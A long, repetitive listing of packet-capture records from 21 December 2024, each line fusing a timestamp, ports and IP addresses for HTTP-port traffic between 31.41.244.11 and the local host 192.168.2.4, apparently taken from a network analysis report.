                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.506309986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.506378889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.506386995 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.506428957 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.507483006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.507571936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.507632017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.508687973 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.508754969 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.508783102 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.508836031 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.509884119 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.509926081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.510003090 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.510046005 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.510992050 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.511035919 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.511116982 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.511225939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.512167931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.512214899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.512296915 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.512339115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.513371944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.513426065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.513483047 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.513524055 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.514576912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.514636040 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.514667988 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.514708042 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.515719891 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.515815020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.515863895 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.516937971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.517002106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.517112970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.517174959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.518040895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.518085957 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.518174887 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.518295050 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.519224882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.519267082 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.519403934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.519445896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.520416021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.520509005 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.520585060 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.520626068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.521590948 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.521631002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.521703959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.521903038 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.522877932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.522947073 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.522953033 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.522986889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.523961067 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.524002075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.524070978 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.524108887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.525222063 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.525269985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.525275946 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.525319099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.656754971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.656969070 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.657018900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.657058001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.657274961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.657313108 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.657406092 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.657444000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.658432007 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.658473015 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.658545971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.658586025 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.659631014 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.659676075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.659753084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.659790039 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.660794020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.660835981 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.660902977 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.660943031 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.662075043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.662120104 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.662233114 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.662291050 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.663117886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.663161039 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.663264990 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.663307905 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.664321899 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.664365053 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.664412975 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.664450884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.665488958 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.665530920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.665585041 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.665623903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.666685104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.666723967 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.666829109 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.666877985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.667859077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.667907953 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.667995930 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.668039083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.669030905 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.669073105 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.669151068 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.669190884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.670212030 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.670250893 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.670325041 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.670366049 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.671386003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.671425104 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.671525955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.671562910 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.672589064 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.672632933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.672699928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.672811985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.673880100 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.673940897 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.673969030 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.674096107 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.674916983 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.674959898 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.675045013 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.675092936 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.676089048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.676136017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.676223040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.676321030 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.677333117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.677376032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.677452087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.677509069 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.678478956 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.678529024 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.678607941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.678649902 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.679656029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.679702044 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.679784060 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.680008888 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.680824995 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.680874109 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.680970907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.681025982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.681978941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.682091951 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.682127953 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.682172060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.683162928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.683202982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.683264971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.683305979 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.684355974 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.684452057 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.684454918 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.684494019 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.685513973 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.685554028 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.685611010 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.685662985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.686657906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.686749935 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.686800003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.686845064 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.687863111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.688035011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.688083887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.689023018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.689161062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.689209938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.690215111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.690264940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.690345049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.690390110 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.691391945 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.691541910 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.691591978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.692553997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.692595959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.692657948 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.692698002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.693768024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.693811893 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.693911076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.693983078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.694966078 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.695035934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.695044994 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.695079088 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.696099997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.696144104 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.696202040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.696244001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.697375059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.697417974 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.697451115 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.697494984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.698455095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.698503017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.698561907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.698661089 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.699590921 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.699744940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.699776888 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.699793100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.700823069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.700869083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.700921059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.700963020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.701997042 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.702043056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.702095032 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.702145100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.703166008 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.703269958 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.703331947 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.704355001 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.704440117 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.704458952 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.704502106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.705574989 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.705626011 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.705683947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.705724001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.706712008 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.706768036 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.706852913 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.706962109 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.707880974 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.707947016 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.708075047 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.708193064 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.709038973 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.709129095 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.709157944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.709211111 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.710227966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.710295916 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.710351944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.710534096 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.711397886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.711452961 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.711524963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.711566925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.712574959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.712625027 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.712718964 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.712764978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.713778973 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.713835955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.713866949 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.713960886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.714962959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.715019941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.715054035 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.715096951 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.716133118 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.716202021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.716202974 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.716240883 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.717279911 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.717322111 CET4979780192.168.2.431.41.244.11
